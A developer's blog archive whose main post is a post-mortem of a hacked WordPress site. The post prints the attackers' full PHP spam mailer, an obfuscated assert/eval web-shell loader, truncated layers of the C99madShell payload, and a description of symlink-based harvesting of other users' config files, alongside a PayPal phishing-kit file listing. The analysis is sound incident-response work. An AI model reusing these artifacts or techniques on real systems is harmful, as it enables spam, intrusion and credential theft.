somewhere to talk about random ideas and projects like everyone else



Blog Reboot 11 April 2015

this blog

This is my submission to blogdom’s burgeoning class of eternally “work in progress” sites. I’ve been working on this blog reboot for nearly a year at this point (rest assured, I haven’t worked on it for any appreciable fraction of that time— but it’s nonetheless traumatizing for me as “blog posts written” is my primary metric for personal productivity).

There’s still a lot left to be done, but right now it should be in a more or less functional and navigable state. I’ve just added image thumbnailing (so this homepage shouldn’t take a Triassic aeon to load anymore), which seems like an addition substantial enough to warrant some new words adorning the featured post callout.
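
(For the curious, static-site thumbnailing is only a few lines of scripting. Here is a rough sketch of the kind of build step involved, in Python with Pillow; the directory names and the 400-pixel target are placeholder assumptions, not necessarily what this site actually uses.)

# thumbs.py: pre-generate homepage thumbnails for a static site (illustrative sketch)
# Pillow is assumed to be installed; "images" and "images/thumbs" are made-up paths.
import pathlib
from PIL import Image

SRC = pathlib.Path("images")
DST = pathlib.Path("images/thumbs")
DST.mkdir(parents=True, exist_ok=True)

for path in SRC.glob("*.jpg"):
    img = Image.open(path)
    img.thumbnail((400, 400))             # preserves aspect ratio, never upscales
    img.save(DST / path.name, quality=80)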

Most importantly though, it’s now a hip static site hosted on GitHub Pages (though I might move to S3), so the Turkish phishers’ last remaining venue for hijacking this site may be sending a pull request.

Getting Hacked

I don’t generally pay a lot of attention to this blog, except at the beginning of every month. I used to hold myself to a rule that I would post something new at least once a month, but that policy kept slipping, and there was always a mad dash to finish some blog post on the first or second day of each new month so it could be retroactively timestamped.

Anyway, the point is that I didn’t notice for a few days when the site got hacked. Unfortunately I don’t have any screenshots of what the site looked like when it was hacked. And at this point I can’t promise you that my mental model of what it looked like is anything more than a hallucination.

It’s a bit of an interesting chapter in my blog’s history, so I’ve spun off this section into its own post.

First Sketches

I guess it makes a reasonable amount of sense to write about how this site works. This is the first incarnation of the blog which is, to any appreciable extent, aesthetically original. It isn’t the default theme of JupiterCMS or PHPFusion, nor is it a free WordPress template.

It’s a pretty simple design, and it’s pretty nifty that in this day and age, a design which is sparse out of ignorance is indistinguishable from a good design which is sparse by (uh) design. There isn’t much besides the simple arrangement of rectangles and lines, and it relies pretty heavily on typography and whitespace to delimit sections.

At around the same time my blog stopped working, I came into possession of a Moleskine. On June 14th, apparently, I started my first sketch of what my blog might be like.

In retrospect, it didn’t really look very coherent and I have literally no idea what I was trying to do at the time. But one of the motivations behind the entire endeavor was to strike a sort of balance between a blog and a portfolio. I like the idea of documenting the process of things and writing out some part of the thought process in a somewhat non-abbreviated form. But one thing that I noticed is that a blog is a terrible means of surfacing older content, and I think a lot of the interesting ideas I’ve explored are the ones which I played around with several years ago.

On the other end of the spectrum, I didn’t want to go too far in the direction of summary. I didn’t quite want it to be simply a résumé where I condense every endeavor into two buzzword-packed sentences which summarize the little iota of cleverness imbued in the project.

And so the motivation of the design was finding some way to hybridize the two goals— summary and process.

I found another sketch in my Moleskine dated June 24th, which seems to be a bit more coherent. On the right you can see some blocks and lines which, while not having much bearing on the current site design, at least look like they might pass a Turing-test criterion for a sufficiently website-ish website.

One thing that I noticed is that the sequence of my projects tends to be pretty structured. Over the years, I tend to explore little ideas which eventually culminate in singular projects— or alternatively, I build a larger project and spin off smaller components. All of this tends to happen over a relatively short time period (a few months to a year).

So in terms of a projects list, this means that I can introduce a bit of an aesthetic cadence where a series of minor projects are occasionally punctuated by larger projects. And because of this natural faux-hierarchy there’s a natural clustering which is generally both temporal and subjective. The short projects have single-sentence summaries, whereas the larger projects can have a paragraph worth of elaboration.

Naturally, all the project descriptions are hyperlinked and lead to a project page which includes all the blog posts documenting the process of creating that particular project.

New Tools

At some point I helped design a mobile app and ended up getting reasonably familiar with Adobe Illustrator.

It was also at this time that I started using tools that designers use— things like Adobe Illustrator and Bohemian Coding’s Sketch.


Blog Hacked 07 June 2014

I don't actually understand what the units of the Y axis are

Well, so my blog got hacked. Even more unfortunate is that I can’t seem to locate any trace of what it looked like when it was hacked. I guess that’s the problem when you write a post-mortem literally a year after the original incident.

All that’s left is some eerie hints that something happened.

My blog was averaging around 350MB of bandwidth per day, when suddenly on June 6th, it started to spike. In fact, between June 6th and 7th, it used a total of over 40GB of bandwidth. It had eaten through my entire monthly bandwidth quota.

At 6:48pm on June 7th, I discovered that something was going on with my blog and started the process of fixing it. I looked through some of the access logs and saw a particular abundance of requests for a strange file, pffam.php:

91.234.164.143 - - [07/Jun/2014:05:07:18 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.26.204.99 - - [07/Jun/2014:05:07:19 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"
46.173.111.151 - - [07/Jun/2014:05:07:21 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"
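
(A quick way to make a file like this jump out of an access log is to tally requests per path and per client IP. Something like the following rough Python sketch works on Apache-style logs; the log filename is an assumption.)

# count requests per requested path and per client IP in an Apache combined log
from collections import Counter

paths, ips = Counter(), Counter()
with open("access_log") as log:
    for line in log:
        parts = line.split()
        if len(parts) < 7:
            continue
        ips[parts[0]] += 1      # the client IP is the first field
        paths[parts[6]] += 1    # the requested path is the seventh field
print(paths.most_common(5))
print(ips.most_common(5))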

Presumably pffam.php was the bit of malicious code which was injected onto my server, acting as a nice endpoint for receiving and executing particular actions. It seems that Indy Library is a networking library for Delphi, and that user agent is the default one its HTTP client sends.

It’s interesting that the endpoint is being hit by multiple IP addresses, and they all seem to geolocate to Eastern European countries. Presumably they’ve built some sort of graphical Command & Control panel out of Visual Basic or something.

Unfortunately, it looks like I replaced the entire WordPress installation with an older backup— so I don’t actually have any copies of pffam.php. But it managed to use 40GB of bandwidth, and hackers are hardly keen on keeping all their eggs in one basket, so surely there must have been other endpoints— right?

Sure enough, there’s another endpoint:

109.87.224.22 - - [06/Jun/2014:21:18:06 -0400] "POST /ajaxanimator/stick2-old/jsgif/Demos/dswbk.php HTTP/1.1" 200 4 "-" "Mozilla/3.0 (compatible; Indy Library)"

And it looks like it was buried underneath enough files that I hadn’t noticed and deleted it— woot? In fact, there are actually a number of fascinating files and folders in that directory:

├── IT2_9z38yd
├── PwdbqQ3nh0
├── SLn30gBqqv
├── SPIFBSYgsr
├── UXLPRmw9YY
├── XviRYdmJ4H
├── baZn0aynkw
├── bosa.php
├── dibdt.php
├── dswbk.php
├── fr1.php
├── hummjvq.php
├── ptRiJiayze
│   ├── VjQauM_3Ev
│   │   ├── btn_bg_sprite.gif
│   │   ├── cv_amex_card.gif
│   │   ├── cv_card.gif
│   │   ├── de-security-hero.png
│   │   ├── form.css
│   │   ├── form.dat
│   │   ├── form.php
│   │   ├── help.jpg
│   │   ├── help2.html
│   │   ├── hr-gradient-sprite.png
│   │   ├── ie6.css
│   │   ├── ie7.css
│   │   ├── ie8.css
│   │   ├── index.css
│   │   ├── index.dat
│   │   ├── index.php
│   │   ├── interior-gradient-bottom.png
│   │   ├── interior-gradient-top.png
│   │   ├── jquery.creditCardValidator.js
│   │   ├── jquery.min.js
│   │   ├── jquery.validationEngine-de.js
│   │   ├── jquery.validationEngine.js
│   │   ├── leftknob.png
│   │   ├── loading.css
│   │   ├── loading.php
│   │   ├── logo_paypal_106x29.png
│   │   ├── mid.swf
│   │   ├── midopt.swf
│   │   ├── mini_cvv2.gif
│   │   ├── nav_sprite.gif
│   │   ├── paypal_logo.gif
│   │   ├── pp_favicon_x.ico
│   │   ├── scr_arrow_4x6.gif
│   │   ├── scr_backgradient_1x250.gif
│   │   ├── scr_content-bkgd.png
│   │   ├── scr_gray-bkgd.png
│   │   ├── scr_gray-bkgd_001.png
│   │   ├── secure_lock_2.gif
│   │   ├── sprite_flag_22x16.png
│   │   ├── sprite_header_footer_94.png
│   │   ├── sprite_ia.png
│   │   ├── sprite_ia_001.png
│   │   ├── validationEngine.jquery.css
│   │   ├── verify
│   │   └── vertical-gradient-sprite.png
│   └── verification
├── sthy.php
├── vlizzvij.php
├── x4MslaR1CW
│   ├── BN3R5U8sF5
│   │   ├── btn_bg_sprite.gif
│   │   ├── cv_amex_card.gif
│   │   ├── cv_card.gif
│   │   ├── de-security-hero.png
│   │   ├── form.css
│   │   ├── form.dat
│   │   ├── form.php
│   │   ├── help.jpg
│   │   ├── help2.html
│   │   ├── hr-gradient-sprite.png
│   │   ├── ie6.css
│   │   ├── ie7.css
│   │   ├── ie8.css
│   │   ├── index.css
│   │   ├── index.dat
│   │   ├── index.php
│   │   ├── interior-gradient-bottom.png
│   │   ├── interior-gradient-top.png
│   │   ├── jquery.creditCardValidator.js
│   │   ├── jquery.min.js
│   │   ├── jquery.validationEngine-de.js
│   │   ├── jquery.validationEngine.js
│   │   ├── leftknob.png
│   │   ├── loading.css
│   │   ├── loading.php
│   │   ├── logo_paypal_106x29.png
│   │   ├── mid.swf
│   │   ├── midopt.swf
│   │   ├── mini_cvv2.gif
│   │   ├── nav_sprite.gif
│   │   ├── paypal_logo.gif
│   │   ├── pp_favicon_x.ico
│   │   ├── scr_arrow_4x6.gif
│   │   ├── scr_backgradient_1x250.gif
│   │   ├── scr_content-bkgd.png
│   │   ├── scr_gray-bkgd.png
│   │   ├── scr_gray-bkgd_001.png
│   │   ├── secure_lock_2.gif
│   │   ├── sprite_flag_22x16.png
│   │   ├── sprite_header_footer_94.png
│   │   ├── sprite_ia.png
│   │   ├── sprite_ia_001.png
│   │   ├── validationEngine.jquery.css
│   │   ├── verify
│   │   └── vertical-gradient-sprite.png
│   └── verification
├── xstyles.php
└── yl27ceCuPh

So it looks like most of these folders are actually empty, and a lot of the rest of the top level PHP files are the same.

It seems that bosa.php, dibdt.php, dswbk.php, hummjvq.php, sthy.php, and vlizzvij.php are identical.

<?php
$to      = stripslashes($_POST["to_address"]);
$BCC      = stripslashes($_POST["BCC"]);
$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);
$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]); 
$contenttype = $_POST["type"];


if (strlen($from_address) > 3)
{
$header = "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .=  "From: $from_name <$from_address>\r\n";
$header .=  "Reply-To: $from_name <$from_address>\r\n";
$header .= "Subject: $subject\r\n";

$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}




if($result)
{
echo 'good';
}
else
{
    'error : '.$result;
}
?>

I’m guessing that it’s being used to send spam messages to different people using the PHP mail() function.


More interesting is fr1.php, which is obfuscated as a giant base64-encoded, deflate-compressed string.

eval(gzinflate(base64_decode('HZzHkoTKkkQ/591r...h/Pp/jc/L/+59///33f/4f')));

So to see what was inside, I stuck it in a different file and replaced the eval with echo. The first time I ran it, I did a bit of a double take because the result looked like this:

eval(gzinflate(base64_decode('FZ23kuNKtkU/Z+4NGN...gRP6r//+ffff//v/wE=')));

And if two times isn’t sufficiently meta, it happens a third time:

eval(gzinflate(base64_decode('FZy3buRaFkU/Z94DA3q...GAfkEQPM8TBK/yP//+++9//w8=')));

A fourth…

eval(gzinflate(base64_decode('HZ3HkqPqlkYf554TDPAuO...7fM8QRAFr//+9z///vvv//wf')));

fifth…

eval(gzinflate(base64_decode('FZzHjuNaskU/p+8FB/...qAgCFAAAIIgiYKX8N///Pvvv//3/w==')));

sixth…

eval(gzinflate(base64_decode('FZzHbuvKtkU/554...L63//+8++///73/wE=')));

seventh…

echo(gzinflate(base64_decode('FZ3HbuRKEkU/Z94...4nCAI0SDH/+ffff//7fw==')));

Actually, it goes on 40 more times, like a demented matryoshka doll. The final layer isn’t UTF-8 encoded, so I had to guess a handful of encodings before discovering that it was what Sublime Text calls “Cyrillic (Windows 1251)”. It’s 1500 lines, so I’ve posted it in a Gist rather than sticking it inline here.
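
(Rather than pasting the output back in forty-odd times by hand, the unwrapping is easy to automate. Here is a rough sketch in Python instead of PHP, under the assumption that each layer is just another copy of that eval/echo-gzinflate-base64_decode wrapper.)

# unwrap.py: repeatedly peel eval(gzinflate(base64_decode('...'))) layers (sketch)
import base64, re, zlib

with open("fr1.php", "rb") as f:
    code = f.read()

wrapper = re.compile(rb"(?:eval|echo)\(gzinflate\(base64_decode\('([^']+)'\)\)\)")
while True:
    match = wrapper.search(code)
    # only keep peeling while the wrapper makes up essentially the whole file;
    # the innermost payload may contain base64 blobs of its own
    if not match or len(match.group(0)) < 0.9 * len(code):
        break
    raw = base64.b64decode(match.group(1))
    code = zlib.decompress(raw, -15)     # PHP's gzinflate() is raw DEFLATE, no zlib header

# the innermost layer turned out to be Windows-1251 ("Cyrillic") rather than UTF-8
print(code.decode("cp1251", errors="replace"))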

I skimmed through the code and it seemed relatively safe— or at least it didn’t seem to plant any rootkits or start any persistent processes. So I ran it and got a screenshot. It seems to call itself “C99madShell v. 3.0 BLOG edition.php”.

[Screenshot: the C99madShell web shell interface]


The other distinct file, xstyles.php, seems to be a little more unusual.

<?php 

$n = 'ss';
$r ="rt";
$a = "a";
$y='e';
$q = $a.$n.$y.$r;

$v = '5b17fxo30zD8d/Ip5C3tQoMx4CRXYgx...8B';

@$q("e"."va"."l('\x65\x76\x61\x6c\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x76\x29\x29\x29\x3b');");

So what does it do? Well, the first part basically just assembles $q so that it holds the string “assert”.

bool assert ( mixed $assertion [, string $description ] )

When PHP’s built-in assert function is passed a string $assertion, it evaluates that string as PHP code. It’s less well known than eval, so this is plausibly useful for evading firewalls of a certain sort. So what it finally translates to is:

assert("eval('eval(gzinflate(base64_decode($v)));');")

The decoded file starts out like this:

<?php
$auth_pass = "cef26cef9c9fdbdb49363368c8921635";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

I searched around for the password, but nobody’s yet been able to find a matching plaintext. However, along the way I found out about PHPDecoder which would have saved quite a bit of time an hour ago.

This one is also 1500 lines, so I’ve posted it in another Gist. This one looks aesthetically a bit nicer— if it’s not too weird to compliment the tools of the people who hacked your website.

[Screenshot: the xstyles.php web shell’s interface]


There’s one (hah, pun not intended) folder entitled 1/ which is particularly interesting. It has three subdirectories: configweb, sym, and tumdizin.

Configweb seems to be a directory filled with symlinks to 9414 distinct configuration files, each of them residing in someone else’s home directory. It encompasses lots of different software packages, including Joomla, WordPress, Zen Cart, SMF, WHM, osCommerce, vBulletin, and more.

The directory sym seems to just contain a symlink entitled root to— you guessed it— /.

And finally tumdizin seems to link to the web roots of 116 distinct shared hosting accounts which happen to reside on the same server.
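
(Incidentally, this sort of symlink farm is easy to sweep for after the fact. Here is a rough Python sketch of the kind of check that would have caught it; the document root is taken from the error_log excerpt further down, and the rest is an assumption about how one might do it rather than something I actually ran.)

# flag any symlink under the web root whose target resolves outside of it
import os

DOCROOT = os.path.realpath("/home/antimatt/public_html")

for dirpath, dirnames, filenames in os.walk(DOCROOT):
    for name in dirnames + filenames:
        full = os.path.join(dirpath, name)
        if os.path.islink(full):
            target = os.path.realpath(full)
            if not target.startswith(DOCROOT + os.sep):
                print(full, "->", target)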


There are also those folders which blow up the tree above, x4MslaR1CW and ptRiJiayze. You can probably guess from files like logo_paypal_106x29.png that this site essentially got turned into a phishing website for PayPal. I’m actually rather amazed that the result looks so plausible.


However, it seems that there was some weird activity going on starting a few days before the massive traffic spike. There’s an error_log file which grows pretty slowly in general. There was a fairly large stretch from January to June with no errors— and then it started constantly encountering these errors in the days leading up to the traffic spike:

[03-Jun-2014 17:06:05 UTC] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/antimatt/public_html/wp/wp-rss.php(1) : eval()'d code:1) in /home/antimatt/public_html/wp/wp-includes/pluggable.php on line 1121
[04-Jun-2014 19:31:54 UTC] PHP Warning:  include(images/settings.php): failed to open stream: No such file or directory in /home/antimatt/public_html/wp/wp-content/themes/carrington-woot/footer.php on line 24
[04-Jun-2014 19:31:54 UTC] PHP Warning:  include(images/settings.php): failed to open stream: No such file or directory in /home/antimatt/public_html/wp/wp-content/themes/carrington-woot/footer.php on line 24

I ended up downloading a daily backup of the server which was taken before it was hacked (June 1, 2014) and installing it onto a small virtual machine. I downloaded a WordPress plugin for exporting the entire website as static HTML pages and uploaded the result to GitHub Pages. This served as a stop-gap measure for almost an entire year while I was getting the new site to work.

This experience is largely why I decided that this new incarnation would be a static site— essentially free from the perils that come with a dynamic website. It’s not like the old version used dynamic content to much advantage; it was cached heavily enough to be practically static anyway.


August Progress Report 31 August 2013

It must be infuriating to be in a situation where there’s a clear problem, and all the obvious remedies continually fail to produce any legitimate result. That’s what this blog is like: every month rolls by with some half-baked ideas partially implemented and barely documented. And on the last day of the month, there’s a kind of panicked scramble to fulfill an entirely arbitrary self-enforced quota just to convince myself that I’m doing stuff.

Anyway, it’s pretty rare for me to be doing absolutely nothing, but mustering the effort to actually complete a project to an appreciable extent is pretty hard. This might be in some way indicative of a shift in the type of projects that I try to work on: they’re generally somewhat larger in scope or otherwise more experimental. And while I may have been notorious before for not leaving projects in a well-documented and completed state, these new ideas often languish much earlier in the development process.

There’s always pressure to present things only when they are complete and presentable, because after all timing is key and nothing can be more detrimental to an idea than ill-timed and poor execution. But at the same time, I think the point of this blog is to create a kind of virtual paper trail of an idea and how it evolves, regardless of whether or not it falters in its birth.

With that said, I’m going to create a somewhat brief list of projects and ideas that I’m currently experimenting with or simply have yet to publish a blog post for.

  • One of the earlier entries in the backlog is an HTML5 Scramble With Friends clone, which is highly performant on mobile with touch events and CSS animations while supporting keyboard-based interaction on desktop. I’ve always been intending to build some kind of real-time multiplayer server component so that people could compete against each other live. Maybe at some point it’ll be included as a kind of minigame within Protobowl.
  • The largest project is definitely Protobowl, which has just recently passed its one year anniversary of sorts. It’s rather odd that it hasn’t formally been given a post on this blog yet, but c’est la vie. Protobowl is hopefully on the verge of a rather large update which will add several oft-requested features, and maybe by then I’ll have completed something which is publishable as a blog post.
  • Font Interpolation/Typeface Gradients. I actually have no idea how long this has been on my todo list (years, no doubt), but the concept is actually rather nifty. With attributes like object size or color, things can be smoothly interpolated in the form of something like a gradient. The analogue for this kind of transition when applied to text would be the ability to type a word whose first letter is in one font and whose last letter is in another, with all the intermediate letters some kind of hybrid. I never did get very far in successfully implementing it, so it may be a while until this sees the light of day.
  • I’ve always wanted to build a chrome extension with some amount of OCR or text detection capabilities so that people could select text which was embedded within an image as if it weren’t just an image. At one point I narrowed down the scope of this project so that the OCR part wasn’t even that important (the goal was then just some web worker threaded implementation of the stroke width transform algorithm and cleverly drawing some rotated boxes along with mouse movements). I haven’t had too much time to work on this so it hasn’t gone too far, but I do have a somewhat working prototype somewhere. This one too is several years old.
  • In the next few days, I plan on publishing a blog post I’ve been working on which is something of a humorous satire on some of the more controversial issues which have arisen this summer.
  • And there are several projects which have actually gotten blog posts which weren’t themselves formal announcements so much as a written version of my thinking process behind them. I haven’t actually finished the Pedant, in spite of the fact that the hardware is theoretically in something of a functional state (I remember that I built it with the intent that it could be cool to wear around during MIT’s CPW back in April, but classes start in a few days and it hasn’t progressed at all since). Probably one of the most promising ideas is the kind of improved, vectorized, and modern approach to video lectures, but that too needs work.
  • I’m building the website for a local charity organization which was started by a childhood friend, and maybe I’ll publish a blog post if that ever gets deployed or something.

hqx.js - pixel art scaling in the browser 31 March 2013


Every once in a while some gadget has the misfortune of epitomizing the next first-world problem. I guess right now, that is owning a Retina (or equivalent) laptop or tablet (arguably phone too, but most web pages are scaled out so it’s not that big of a problem) and being irked at the prevalence of badly scaled graphics. So there’s a new buzzword, “Retina Ready”, for websites, layouts, and designs which serve higher-resolution graphics to devices which support them, often meaning lots of new files and new CSS rules. It’s this trend of high-pixel-density devices (the iPad 3, Retina MacBook Pro, Nexus 10, and Chromebook Pixel, though I for one don’t currently have any of them, just this old glitchy-albeit-functional first-generation Chromebook) that is driving people to vector icon fonts.

But the problem of radical increases in resolution isn’t a new one. Old arcade games rarely exceeded 260x315, and the Game Boy Color had a paltry 160x144. While a few people still nostalgically lug around game cabinets and dig out their dust-covered childhood handheld consoles for sneezing fits, most of the old games are now played with emulators running on systems several orders of magnitude more sophisticated in every imaginable aspect. So that arcade monitor which once could engross a childhood (and maybe early manhood) now appears as nothing more than a two-inch square on a twenty-inch monitor. But luckily there is a surprisingly good solution to all of this, in the form of algorithms designed specifically for scaling pixel art.

The most basic form of image scaling that exists is called nearest-neighbor interpolation, which is extra simple for retina devices because it means simply growing the size of each pixel by a factor of two along each axis. That leads to things which are blocky and which, unless you’re part of an 8-bit retro-art project with a chiptune soundtrack, look ugly.
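
(In code, integer-factor nearest-neighbor scaling really is just pixel repetition; a tiny numpy sketch, just to make the point concrete:)

# nearest-neighbor 2x upscale: every pixel becomes a 2x2 block
import numpy as np

def nearest_neighbor_2x(image):
    # image is an (H, W) or (H, W, channels) array
    return np.repeat(np.repeat(image, 2, axis=0), 2, axis=1)

tile = np.array([[0, 255], [255, 0]], dtype=np.uint8)   # a 2x2 checkerboard
print(nearest_neighbor_2x(tile))                        # becomes 4x4, still hard-edged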

The most common forms of image scaling borrow a lot from the math and signal-processing fields, with names like bilinear, bicubic, and Lanczos: essentially, they treat an image as some kind of composition of sinusoidal parts and try to extrapolate and interpolate in a way that minimizes visible artifacts. It’s all very mathy, but the result is kind of the opposite of nearest-neighbor, because it has the tendency to make things blurry and fuzzy.

The thing is that the latter tries to reach some kind of mathematical ideal, because images taken by your friendly neighborhood DSLR-toting amateur (spider-powers optional) are actually samples of real-world points of data, so this mathematical pursuit of purity works out very well. There’s still the factor-of-four information-theoretic gap that needs to be filled in with best-guesstimates, but there isn’t really any way to improve the way a photograph is scaled without using a higher-resolution version of said photograph. But most photographs taken these days are already sixteen-megapixel monsters, and they usually still look acceptable when upscaled.

The problem arises with pixel art, little icons or buttons which someone painstakingly drew in Photoshop one lazy summer afternoon in the late 90s. They’re everywhere, and each pixel wasn’t captured and encoded by sampling some analog natural phenomenon— each pixel was lovingly crafted and planted by some meticulous artist. There is no underlying analog signal to interpret; it’s a direct perceptual hookup to the mind of the creator— and that’s why bicubic sampling looks especially bad here.

Video games, before 3D graphics engines and math-aware anti-aliasing concerned with murdering jaggies, in the old civilized age of bit-blitting, were mostly constructed out of pixel art. Each color in that limited palette was placed there for a reason and could be exploited by specialized algorithms to construct higher-quality upscaled versions which remained sharp. These come with names like EPX, Scale2x, AdvMAME2x, Eagle, 2xSaI, Super 2xSaI, hqx, and most recently, Kopf-Lischinski. These algorithms could be applied in real time to emulator windows to acceptably scale a game to new sizes while eschewing jagged corners and blurry edges.

Anyway the cool thing is that you can probably apply these algorithms in lieu of the nearest-neighbor or bilinear scaling algorithms used by browsers on retina platforms to effortlessly upgrade old sites to shiny and smooth. With a few rough heuristics (detect if an image appears to be a sprite by testing for a limited palette, see if the image is small or a perfect square, detect if it has transparent pixels) this could be packed into a simple script include that website makers could easily inject into their pages to automagically upconvert old graphics to new shiny high-resolution ones without having to go through the actual effort of drawing new high resolution graphics and uploading them online. And this could also be packaged as a browser extension so that, once and forever after, this first-world nuisance shall be no more.
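
(Those heuristics are simple enough to sketch out. Here is roughly the idea in Python with Pillow, standing in for what would really need to be browser-side JavaScript; the 64-color and 256-pixel thresholds, and the way the checks are combined, are arbitrary guesses.)

# rough guess at whether an image is pixel art worth running through hqx-style scaling
from PIL import Image

def looks_like_pixel_art(path, max_colors=64, max_size=256):
    img = Image.open(path).convert("RGBA")
    w, h = img.size
    limited_palette = img.getcolors(maxcolors=max_colors) is not None  # None means too many colors
    small = w <= max_size and h <= max_size
    square = w == h
    has_transparency = any(px[3] < 255 for px in img.getdata())
    return limited_palette and (small or square or has_transparency)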

Before setting out to port hqx-java to JavaScript, I did some cursory googling to see if it had been done before. Midway through writing this post, I found out that it actually had been, in a better way, so I won’t even bother linking to my inferior version. But either way, the actual goal of this project was the part detailed in the last paragraph: an embeddable script or browser extension which could heuristically apply pixel-scaling algorithms— something I probably won’t bother trying to do until at least after I get my college laptop (which I anticipate will be a Retina MacBook Pro 15”). Nonetheless, I haven’t written an actual blog post in almost three months and it’s the last day of this month, so I guess this is better than having you all (though probably nobody’s going to read this now that Google Reader has died) assume that I’ve died. Anyway, now I’m probably going to retroactively publish old blog posts in previous months to feign continuity.


Meta Analytics 17 August 2012

I’ve been maintaining this blog, or at least the content inside it, for about five years now. It’s been through a handful of incarnations, often paired with significant changes in web hosting. I’ve had a blog for a little bit longer than that, but I don’t think I have the medium figured out. The structure and style of the posts have changed over the past few years, but I can’t at this point call it evolution, a positive progression. Part of the power in analyzing data is the ability to recognize patterns at a different scale from ordinary human observation (spans of months or years), patterns which are equally if not more insightful.

That’s been my personal attraction to data science. I’ve had a couple of personal experiments involving collecting data about my daily activities, my old writing, and my code, in hopes of distilling the changes that I’m too conceited to admit without the infallible hand of statistics. For nearly two years now, I’ve logged my entire life to a precision of approximately 30 minutes in Google Calendar (or the Calendar app on the iPad, which syncs to Google Calendar). Actually, the labeling is slightly off: I quite often dedicate large spans of time to more or less useless labels like “not productive”. But this temporal information falls apart in terms of richness, for my schedule is dictated more by the mandatory rhythms of school life than by the drifting cadence of other behavior.

But I digress. This isn’t about why I collect data so much as “I have this data, now what?”. In this case, I had a hypothesis, a rather simple albeit morbid one at that: “my blog is dying”. It’s not hard to see how I arrived at that conclusion. I’m pretty much struggling at this point to meet my goal of one post per month (itself not a particularly difficult goal, but as time has gone on and my posts have become more infrequent, I feel more compelled to write obscenely long posts to compensate, which of course also leads to big posts sitting there unfinished for long durations, losing the sort of one post = one sitting mentality). But before I ramble for too long, I’ll cut to the chase and answer the question posed at the beginning of this paragraph: “Graphs.” (You could imagine those haunting glyphs levitating in midair, caught in the invisible grasp of Giorgio A. Tsoukalos, or better yet, I can spare your cognitive abilities by making it real.)

Here’s a pretty little graph I made in R (sorry for the mess on the horizontal axis; I just realized I have no idea how to interpret the dates, so I’m assuming they’re linear and it’s just some odd aliasing issue that makes even-numbered years repeat twice). It’s a histogram of the dates of the posts that I’ve made to this blog (extracted with a simple Python script and WordPress’s built-in Export button). You can probably tell that the blog’s demise has been quite a long time coming. Every annual peak ends up shallower than the year before, and the first time gaps have actually appeared was this fateful year, 2012.

It’s actually sort of interesting that these peaks exist, but I can’t really tell during which months they happened (since these axes are labeled so terribly; it’d be nice if I knew some nice interactive graphing engine that worked with histograms, something like that cool time-series viewer Google has had for Finance for basically forever, but for histograms, though I guess that just shows how much of a non-scientist I am, to have no idea how to fluently articulate in a statistical or graphical language of my choice).

For more graph fun, here’s a scatter plot of post lengths (in words) as a function of year. I wasn’t dedicated enough to figure out how to get NLTK to tell me the Gunning-Fog, Flesch-Kincaid, or ARI value for individual posts, and I doubt that would have shown anything particularly insightful. But yeah, so here it is. Charts. Charts of words. Note that the thing which sticks out, clocking in at around 3,724 words, is my first Music Alpha post.

Actually, I won’t mind that WordPress isn’t yet self-aware (’ello Skynet) and still sends trackbacks and pings (whatever they are) to me when I link to myself. Seriously, you don’t actually need to have a self-aware artificial intelligence in order to learn how to not spam me with emails when I’m quite probably, as in super definitely, aware of its existence. But anyway, I guess I’ll stomach the lurching pain of a thousand emails (I’m using hyperbole here, in case your rudimentary artificial intelligence algorithms can’t quite distinguish it, but I’m also pretty sure your algorithms wouldn’t be able to handle n-th degrees of meta, so this excruciatingly useless parenthetical wouldn’t be much other than that: excruciatingly useless) and post the last part of the list here.

1340133957.0 , 2012-06-19 19:25:57 , 1178 [http://antimatter15.com/wp/2012/06/pinball/](http://antimatter15.com/wp/2012/06/pinball/)

1333025085.0 , 2012-03-29 12:44:45 , 1302 [http://antimatter15.com/wp/2012/03/musicalpha-v2-0/](http://antimatter15.com/wp/2012/03/musicalpha-v2-0/)

1293394934.0 , 2010-12-26 20:22:14 , 1409 [http://antimatter15.com/wp/2010/12/drag2up-v2-drag-and-drop-uploading-for-all-sites/](http://antimatter15.com/wp/2010/12/drag2up-v2-drag-and-drop-uploading-for-all-sites/)

1317686582.0 , 2011-10-04 00:03:02 , 1565 [Haven't actually published this yet, hmm]

1341591648.0 , 2012-07-06 16:20:48 , 2117 [http://antimatter15.com/wp/2012/07/cloudfall-a-text-editor/](http://antimatter15.com/wp/2012/07/cloudfall-a-text-editor/)

1307064165.0 , 2011-06-03 01:22:45 , 2180 [http://antimatter15.com/wp/2011/06/why-the-chrome-web-store-is-bad-for-the-web/](http://antimatter15.com/wp/2011/06/why-the-chrome-web-store-is-bad-for-the-web/)

1277922545.0 , 2010-06-30 18:29:05 , 2319 [http://antimatter15.com/wp/2010/06/wave-embed-api/](http://antimatter15.com/wp/2010/06/wave-embed-api/)

1294958307.0 , 2011-01-13 22:38:27 , 2762 [http://antimatter15.com/wp/2011/01/the-ambiguity-of-open-and-vp8-vs-h-264/](http://antimatter15.com/wp/2011/01/the-ambiguity-of-open-and-vp8-vs-h-264/)

1308832860.0 , 2011-06-23 12:41:00 , 2872 [http://antimatter15.com/wp/2011/06/samsung-series-5-chromebook/](http://antimatter15.com/wp/2011/06/samsung-series-5-chromebook/)

1305426252.0 , 2011-05-15 02:24:12 , 3724 [http://antimatter15.com/wp/2011/05/uploading-mp3s-to-google-music-beta-from-linux-chrome-os-win-and-mac/](http://antimatter15.com/wp/2011/05/uploading-mp3s-to-google-music-beta-from-linux-chrome-os-win-and-mac/)

